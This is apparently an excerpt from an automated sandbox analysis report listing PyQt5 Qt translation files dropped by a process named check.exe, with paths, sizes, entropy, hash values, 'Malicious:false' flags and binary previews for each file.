                                                                                                                                                                                                                                      SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                                                      MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                                                      SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                                                      SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                                                      SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):3.984562388316898
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                                                      MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                                                      SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                                                      SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                                                      SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                                                      MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                                                      SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                                                      SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                                                      SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_sl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):228428
                                                                                                                                                                                                                                      Entropy (8bit):4.726953418955661
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                                                      MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                                                      SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                                                      SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                                                      SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_sv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65851
                                                                                                                                                                                                                                      Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                                                      MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                                                      SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                                                      SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                                                      SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):110
                                                                                                                                                                                                                                      Entropy (8bit):3.630483009136986
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                                                      MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                                                      SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                                                      SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                                                      SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):164
                                                                                                                                                                                                                                      Entropy (8bit):4.021402900389864
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                                                      MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                                                      SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                                                      SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                                                      SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_zh_CN.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117347
                                                                                                                                                                                                                                      Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                                                      MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                                                      SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                                                      SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                                                      SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):141
                                                                                                                                                                                                                                      Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                                                      MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                                                      SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                                                      SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                                                      SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160017
                                                                                                                                                                                                                                      Entropy (8bit):5.35627970915292
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                                                      MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                                                      SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                                                      SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                                                      SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165337
                                                                                                                                                                                                                                      Entropy (8bit):5.332219158085151
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                                                      MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                                                      SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                                                      SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                                                      SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):210159
                                                                                                                                                                                                                                      Entropy (8bit):4.666388181115542
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                                                      MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                                                      SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                                                      SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                                                      SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):174701
                                                                                                                                                                                                                                      Entropy (8bit):4.87192387061682
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                                                      MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                                                      SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                                                      SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                                                      SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181387
                                                                                                                                                                                                                                      Entropy (8bit):4.755193800761075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                                                      MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                                                      SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                                                      SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                                                      SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):220467
                                                                                                                                                                                                                                      Entropy (8bit):4.626295310482312
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                                                      MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                                                      SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                                                      SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                                                      SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
